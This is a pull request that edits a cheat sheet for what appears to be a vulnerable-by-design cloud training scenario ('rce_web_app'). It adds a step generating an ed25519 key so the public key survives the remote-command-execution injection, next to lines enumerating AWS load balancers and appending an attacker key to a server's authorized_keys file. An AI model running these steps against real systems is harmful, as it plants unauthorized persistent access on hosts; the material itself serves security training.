### PR TITLE
Correction to Lara cheat sheet

### DIFF
--- a/scenarios/rce_web_app/cheat_sheet_lara.md
+++ b/scenarios/rce_web_app/cheat_sheet_lara.md
@@ -10,6 +10,8 @@
 
 `aws elbv2 describe-load-balancers --profile Lara`
 
+`ssh-keygen -t ed25519` (An ed25519 key pair is necessary here because using an RSA public key is too long and gets truncated in the RCE)
+
 `echo "public ssh key" >> /home/ubuntu/.ssh/authorized_keys`
 
 `curl ifconfig.me`


### PR DESCRIPTION
The SSH key pair generated for the RCE needs to have a public key that's short enough for the RCE. A long public key, such as an RSA public key generated with ssh-keygen, will get truncated in the RCE and cause the command to fail. Using an ed25519 key pair solves this issue.